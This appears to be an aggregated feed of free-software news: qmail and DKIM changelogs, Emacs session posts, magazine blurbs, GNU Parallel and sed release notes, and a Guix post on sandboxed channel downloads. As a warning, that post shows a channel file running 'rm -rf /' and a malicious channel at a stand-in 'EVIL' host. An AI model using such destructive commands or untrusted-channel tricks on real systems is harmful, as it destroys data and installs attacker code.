Ubuntu Core 26 could be a game-changer for organizations looking for increased security and reliability.

• Latest version 2026.04.07 (github)
• Changelog
• Readme

Changelog

• Apr 7, 2026
  - (security) Remote Code Execution via Shell Injection in qmail-remote TLS Error Handler in #42 (tx Diep Pham)
• Apr 2, 2026
  - qmail-remote auth improvements by pierluigi in #39
  - Fixed DKIM ed25519-sha256 signing and verification to conform to RFC8463 by @agerstla in #40
  - Updated qmail-qfilter to support filters defined in control/qfilters by @agerstla in #41
• Feb 25, 2026
  - Improved DKIM status handling by @agerstla in #35
  - Ported over DKIM_BAD_IDENTITY support from Indimail (tx Manvendra Bhangui and Andreas Gerstlauer 1299b55)
  - SNI support for qmail-smtpd by @agerstla in #37
  - Added qmail-qfilter by @agerstla in #38
• Feb 3, 2026
  - Bug fix for verifying multiple DKIM signatures (second one always failed due to a DNS lookup bug). tx Andreas Gerstlaurer #31
  - config-all.sh upgrade #33
  * config-all.sh: moreipme is now populated with IPs in separate lines
  * config-all.sh: rsa dh keys can be created even if the certificate creation is skipped
  * config-all requires to accept overwriting with y/N/a=all options
• Jan 8, 2026
  - bug fixed in helodnscheck: it allowed domains with only one dot #30
• Jan 5, 2026
  - helodnscheck.cpp: PCRE dependency avoided, to make happy Debian 13 d987ec4
  - config-all now grabs the correct network interface c60d3fa
  - config-all will now prompt for 1024/2048 key length for DKIM c842cea
  - Fixed typo in qmailctl 3f1ea75
  - Makefile: Fixed incorrect rule syntax for 'make cert' 80222cc
• Sep 8, 2025
  - Fixes in SPP handling and support for [pass] plugins after RCPT accept. Support for RBLRESULT environment variable and RBL ignore ('=') option. (tx Andreas Gerstlauer)
  - Added -std=gnu17 to conf-cc, fixed some other issues and now it compiles on gcc-15.2 in #28
  - scripts/qmail-pop3d and qmail/pop3sd: ports changed to 110 and 995
  - Received: email header now hides the sender's hostname when the sender is RELAYCLIENT or is authenticated. 785e84b
• Apr 30, 2025
qmailctl, qmHandle, queue_repair and all scripts installed in QMAIL/bin and not in /usr/local/bin by config-all.sh
• Apr 25, 2025
  - added a configuration script config-all, which configure and installs the control files (as per the original config-fast script), aliases, SRS (uses control/me as the srs_domain), log dirs in /var/log/qmail, tcprules (basic, just to make initial tests), supervise scripts, qmailctl script, DKIM control/filterargs and control/domainkeys dir, SURBL, smtpplugins, helodnscheck spp plugin, svtools, qmHandle, queue-repair, SSL key file (optional).
  Consider this feature as "testing"
• Feb 11, 2025
  - Several adjustments to get freeBSD and netBSD compatibility. More info in the commit history. Hints/comments are welcome.
  - freeBSD users have to erase the very 1st line of the file "conf-lib", as libresolv.so in not needed on freeBSD.
  - Dropped files install-big.c, idedit.c and BIN.* files.
  - Dropped files byte_diff.c, str_cpy.c, str_diff.c, str_diffn.c and str_len.c, which break compilation on clang and can be replaced by the functions shipped by the compiler (tx notqmail).
  - Old documentation moved to the "doc" dir. install.c and hier.c modified accordingly
  - conf-cc and conf-ld now have -L/usr/local/lib and -I/usr/local/include to look for srs2 library
  - conf-cc and conf-ld now have -L/usr/pkg/lib and -I/usr/pkg/include to satisfy netBSD
  - vpopmail-dir.sh: minor correction to vpopmail dir existence check
  - srs.c: #include <srs2.h> now without path

Server Name Indication (SNI) è una estensione del protocollo TLS che consente a un server di presentare differenti certificati a seconda dell'hostname richiesto dal client durante il saluto TLS.

In un ambiente email moderno, molti domini condividono uno stesso indirizzo IP per i servizi SMTP, IMAP, POP3 e submission. Senza SNI, un amministratore di un server email può presentare un solo certificato per ogni socket disponibile, cosa che obbliga l'aministratore ad affidarsi a certificati multi-dominio (SAN) o a certificati con wildcard. Questo approccio aumenta i problemi operativi tra gli utenti finali novelli, che spesso non sono in grado di usare la configurazione automatica del client per configurare correttamente le loro mailbox.

L'abilitazione di SNI nei serivizi mail consente al server di presentare il certificato appropriato basato sull'hostname richiesto dal client, contenuto nel suo indirizzo email.

La funzionalità SNI per la mia distribuzione qmail è stata aggiunta da Andreas Gerstlauer (commit qui e qui), che vorrei ringraziare.

• Info: http://www.clamav.net
• Versione usata: 1.5.2

Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.

Changelog

• Mar 4, 2026
  - clamav upgraded to v 1.5.2
• Oct 11, 2025
  - clamav upgraded to v 1.5.0. A recent version of rust is needed (successfully using 1.88 here). Just reinstall as explained below. No particular change is needed in the config files.

• Autore originale: http://www.inter7.com/vqadmin-sysadmin-webcontrol/
• Versione 2.4.7
• Changelog
• Scarica da github
• La mia vecchia patch

VqAdmin è un pannello di controllo su interfaccia web che consente di eseguire azioni che richiedono l'accesso a root — per esempio, aggiungere e cancellare domini.

Come si può vedere, VqAdmin ha una nuova versione con un nuovo aspetto mobile responsive, con tutte le mie vecchie patch incluse (compresa quella di ALI) e diverse correzioni e ripuliture del codice sorgente. Ho risolto tutti i warnings sia di autotools che di gcc e cambiato un paio di cose per poter rifare il tema html (guardare il changelog per maggiori dettagli). Come sempre i contributi nei commenti sono graditi.

PS: anche la parte apache è stata modificata e prima di fare l'aggiornamento è necessario guardare quali modifiche sono necessarie.

Have fun!

Changelog

• Feb 18, 2026 (v. 2.4.7)
  - domain's users lists valiases too #4
  - bug fix in mod_domain.html: Mailing Lists domain limit was not copied correctly (ecce453)
• Jan 31, 2026
  - relaylimits added to control files 4c5a859
  - disabled maintainer mode to avoid autotools regeneration on user builds #3
• Jan 25, 2026
  - Domain's users listed alphabetically by domain and username #2 451da48
  - Dropped simsizelimit control file 868b8b2
• Dec 06, 2024
  - added a patch to highlight users with restrictions and with admin privileges (PR #1, thanks Bai Borko)
  - added control files notlshosts_auto and tlsserverciphers

Questa pagina riguarda la patch DKIM inclusa nella mia patch combinata (maggiori informazioni qui). Questo argomento è avanzato ed è consigliabile tornare qui alla fine del tutto.

• Info: http://www.dkim.org/ - http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail
• Autore della patch: Manvendra Bhangui
• Versione della patch: 1.48
• Scarica: SourceForge - copia locale
• Changelog
• Mirko Buffoni ha pubblicato in un commento una piccola modifica che consente di firmare i messaggi inviati dagli utenti autenticati e di verificare quelli degli utenti non autenticati.

DKIM fornisce un metodo per validare l'identità di un nome a dominio associato a un messaggio con una autenticazione crittografata. La tecnica di validazione è basata sulla crittografia di una chiave pubblica: Il server che invia l'email aggiunge il nome a dominio al messaggio e vi affigge una firma digitale. Questa chiave è posta nell'intestazione DKIM-Signature: del messaggio. Colui che riceve il messaggio può controllare la validità della chiave pubblica leggendo un record TXT del DNS del dominio associato al messaggio.

Sei invitato a dare un'occhiata alle pagine man a partire da qmail-dkim(8) e spawn-filter(8).

Changelog

• Jan 29, 2026
  - Bug fix for verifying multiple DKIM signatures (second one always failed due to a DNS lookup bug). tx Andreas Gerstlauer
• Jul 10, 2025
  added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)
• Feb 12, 2024
  - v. 1.48: fixed minor bug using filterargs for local deliveries (commit)
• Feb 6, 2024
  -DKIM patch upgraded to v. 1.47
  * fixed a bug which was preventing filterargs' wildcards to work properly on sender domain
• Jan 11, 2024
  - version 1.46
  * dk-filter.sh has been dropped. If signing at qmail-remote level, before upgrading, you have to review the configuration as explained below.
  * The variables USE_FROM, USE_SENDER and DKIMDOMAIN have been dropped
  * when signing at qmail-remote level qmail-dkim now has to be called directly by spawn-filter in the rc file. man spawn-filter for more info
  * In case of bounces the signature will be automatically based on the from: field. This will solve issues of DMARC reject by google in case of sieve/vacation bounces.
  * In case of ordinary bounces (mailbox not found, for instance) the bounce domain will be taken from control/bouncehost and, if doesn't exist, from control/me
• Jan 4, 2024
  - patch upgraded to v. 1.44
  * fixed an issue with filterargs where spawn-filter is trying to execute remote:env xxxxx.... dk-filter. This issue happens when FILTERARGS environment variable is not defined in the qmail-send rc script.
  * dkim.c fix: https://notes.sagredo.eu/en/qmail-notes-185/configuring-dkim-for-qmail-92.html#comment3668 
  * adjustments fo dk-filter and dknewkey man pages
• Nov 20, 2023
  * The patch now by default excludes X-Arc-Authentication-Results
  * dkim can additionally use the environment variable EXCLUDE_DKIMSIGN to include colon separated list of headers to be excluded from signing (just like qmail-dkim). If -X option is used with dk-filter, it overrides the value of EXCLUDE_DKIMSIGN.
• Feb 19, 2023 (v. 1.37 upgrade)
  - ed25519 support​ (RFC 8463)
  - multiple signatures/selectors via the enhanced control/dkimkeys or DKIMSIGN / DKIMSIGNEXTRA / DKIMSIGNOPTIONS  DKIMSIGNOPTIONSEXTRA variables
  - domainkey script replaced by dknewkey in order to create ed25519 keys and rsa keys with 1024/2048/4096 bit
  - dropped yahoo's domainkeys support (no longer need the libdomainkeys.a library)
  - man pages revised and enhanced
  - domainkeys directory moved to /var/qmail/control/domainkeys
  - the documentation in this page has been revised. You can find how to sign with the rsa key together with the ed25519 key below.

qmail-spp provides plug-in support for qmail-smtpd. It allows you to write external programs and use them to check SMTP command argument validity. The plug-in can trigger several actions, like denying a command with an error message, logging data, adding a header and much more.

• Author: Pawel Foremski
• More info here

Today I played for the first time with an ancient patch for qmail: qmail-spp. I was really impressed for the ease of use and the elegance of its code, which is inserted inside qmail-smtpd.c with a few touches, despite of the many things that it can do when installed and enabled.

It can run a custom plugin in any language and at any level of the smtp session, grabbing the environment variables, writing into stderr or blocking the smtp session with a return error for the sender.

In no time at all I managed to understand its logic and write a small plugin by adapting a c program I wrote for s/qmail a few months ago to check the validity of the recipient.

Of course I decided to add this patch to my combo. I've just modified the way it has to be enabled, just not to bother those who don't want to touch their run scripts. So, while the original patch is enabled by default, I modified things a little bit so that you have to manually enable it by exporting the variable ENABLE_SPP in your run scripts. Therefore the original NOSPP variable is useless.

Have fun!

• Scarica lo script

Ora che abbiamo preparato i filtri antispam dobbiamo addestrare il nostro sistema bayesiano e inviare i report a Razor, Pyzor e Spamcop.

La cosa più ovvia che può venirci in mente di fare a questo punto è forse quella di lanciare sa_learn e spamassassin --report uno dopo l'altro al click sul bottone "Marca come Spam" della webmail Roundcube (vedere i driver cmd_learn e multi_driver del plugin markasjunk), ma questa scelta ha alcuni svantaggi importanti:

• il processo di addestramento, la conseguente sincronizzazione del journal e la connessione ai vari network per il reporting può richiedere anche una decina di secondi, un tempo che i nostri utenti non sono disposti ad attendere.
• cosa anche più grave, quando essi cliccano sul bottone "Marca come Spam" non è sempre detto che si tratti di un vero messaggo di posta indesiderata. Prendiamo ad esempio il classico caso delle newsletter a cui si sono regolarmente iscritti e che non vogliono più leggere, e che decidono di eliminare etichettandole come spamming anzichè inoltrare una regolare richiesta di cancellazione.

E' qundi più corretto eseguire questi due compiti durante la notte per mezzo di un cronjob (primo problema risolto), processando i soli messaggi di vero spam/ham che l'utente ha consapevolmente copiato in una cartella apposita (secondo problema).

Tired of the nightmares of remotely compiling the kernel with Linux-VServer, a software that I'm pleased with despite of some lack of documentation, these days I was playing with LXC, which is included and supported by Slackware and for which the Linux kernel doesn't need any patching because it already embeds the hacks for LXC containers.

To convert an existing Linux-VServer container in a (eventually unprivileged) LXC container you can follow these steps. I assume that you already know  how to create an LXC container; in case you are interested in unprivileged containers take a look to the excellent Chris Willing's guide (a big thanks to him) linked below.

More info:

• LXC
• Installing Linux-VServer on Slackware

Era ora che riuscissi a liberarmi della vecchia piattaforma Drupal come strumento per questo blog, ma finalmente ho trovato il tempo per migrare il database di Drupal e per riprendere qui la vecchia grafica (solo lo stile, il codice html è mio).

D'altronde, da almeno 15 anni porto avanti lo sviluppo di un mio CMS (basato su php/mariadb), che però originariamente non avevo usato per la mancanza del tempo necessario a costruirmi un tema html.

Ora il sito vive in ambiente Mobile Responsive e soprattutto mi consente di svincolarmi dagli incubi degli aggiormanti di Drupal e dei suoi pacchetti.

La parte sui commenti del presente CMS non è perfettamente collaudata e mi farebbe piacere avere eventualmente dei feedback su ogni problematica, quindi non esitate a scrivermi al riguardo.

Buon divertimento!

Massive Christmas present by my italian friend Luca Franceschini of digitalmind. He merged his combo with my combined patch (2016.12.02 version) adding several (heavily customized) patches and functionalities. Luca is a C programmer and an expert system administrator who manages big servers.

AI is giving Linus Torvalds a headache, but not in the way you might think.

Files by age, newest first:

ls -lt

Docker images by age, newest first:

docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r

Files by size, largest first:

ls -lS

Docker images by size, largest first:

docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh

Why why why??!

Professional fulfillment tops the list, according to LPI report.

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/

Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs.

Here is the video recording of our session, which I share with Prot's permission:

You can view or download the full-resolution video from the Internet Archive.

Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:

(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)

Take care, and so long for now.

Fedora Hummingbird brings the same approach to the host OS as it does to containers to level up security.

A test release of GNUtrition, 0.33.0rc2, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release makes some fixes to the gender option.  It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:

• ftp://alpha.gnu.o ... g/gnu/gnutrition/
• http://alpha.gnu. ... g/gnu/gnutrition/
• https://alpha.gnu ... g/gnu/gnutrition/

Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

With the rise of Linux vulnerabilities, the kernel developers are now considering adding a component that could help temporarily mitigate against them… in the form of a kill switch.

The latest version of Fedora has been released with gaming support.

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pureâ€� evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

• they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
• or, they are the channels currently in use, as returned by guix describe.

This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channelâ€� rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

The latest Manjaro 26.1 preview has been released with new desktop versions, a new kernel, and more.

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs.

Here is the video recording of our session:

You can view or download the full-resolution video from the Internet Archive.

I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days.

In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration).

For mode line padding, here is the snippet I'm using with Prot's doric-themes:

(doric-themes-with-colors
  (custom-set-faces
   `(mode-line
     ((t :box (:line-width 6 :color ,bg-shadow-intense))))
   `(mode-line-inactive
     ((t :box (:line-width 6 :color ,bg-shadow-subtle))))
   `(mode-line-highlight
     ((t :box (:color ,bg-shadow-intense))))))

Take care, and so long for now.

This month in Linux Voice.

This month we explore Zenclora OS 2.0, MocaccinoOS 26.03, NebiOS 10.2, and CachyOS 260308.

Ghost is a powerful CMS for beginners and professionals who want to grow a business around their content.

Corporate communication platforms might be convenient, but they put your privacy at risk. The Matrix open communication standard offers a different approach.

This month we explore the top FOSS, including the ultimate FTP client, a 6502 Assembly Environment, and open source levels for Doom.

As I write this, the San Francisco Superior Court has denied Amazon's motion for a summary judgment on a claim in its defense of a State of California lawsuit alleging anticompetitive behavior.

If you're operating a large collection of Linux servers, OpenSCAP can help with regular auditing and system hardening.

Run your own machine translation service with Argos Translate and LibreTranslate.

Fake cryptocurrency wallets in the Snap Store have cost users hundreds of thousands of dollars. A community project aims to create more transparency for Snap package users.

With memcached, you can establish communication between Arduinos, Pi Picos, handhelds, and other small microcontrollers.

Linkwarden lets you bookmark interesting web pages and saves copies in case the originals disappear.

Recent legislative bills put the burden of restricting minor use of technology onto operating systems, which has potential issues.

Turn your Raspberry Pi 500 into an Amiga 500 with the Pimiga 5 Amiga emulator and gain access to a huge selection of Amiga games, demos, and applications.

Linux users associate open source licenses with software, but a bevy of licenses are available for documents, images, audio/video, fonts, and hardware.

To impress his WhatsApp friends, Mike Schilli builds a chatbot in Go that contacts OpenAI on demand and provides answers.

Use qrcp and Warp to move files effortlessly between your Linux computer, your phone, and even remote systems, minus an account, cables, or network wrangling.

The initial injustice of proprietary software often leads to further injustices: malicious functionalities.

The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.

We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.

Here are our latest additions

April 2026

Proprietary Obsolescence

• Amazon is disconnecting the early models of the Swindle from the Amazon DRM-afflicted book store.

Malware in Appliances

• Some models of Vizio “smart” TVs will have some of their functionalities locked behind a Walmart account login.

GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️

They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.

The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64

About Cyber|Show:
https://cybers ... w.uk/about.php

Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth

Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow

GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  It is a fantastic tool for decades!
    -- Ops_Mechanic@reddit

New in this release:

• Remote jobs are spawned via pipe to perl, so environment can be bigger. This is a major rewrite.
• --pipe-part -a supports -L/-N if zextract is installed.
• --pipe-part -a supports .gz, .bz2, .zst-files if zextract is installed.
• Comments in code is redone.
• Bug fixes and man page updates.

GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.

About GNU Parallel

GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

  parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

  find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

• Give a demo at your local user group/team/colleagues
• Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
• Get the merchandise https://gnuparall ... igns/gnu-parallel
• Request or write a review for your favourite blog or magazine
• Request or build a package for your favourite distribution (if it is not already there)
• Invite me for your next conference

If you use programs that use GNU Parallel for research:

• Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

• (Have your company) donate to FSF https://my.f ... .org/donate/

About GNU SQL

GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.

About GNU Niceload

GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

This is to announce sed-4.10, a stable release.

It's been more than 3.5 years and quite a few new bug fixes.
Special thanks to Paul Eggert, Bruno Haible and Collin Funk
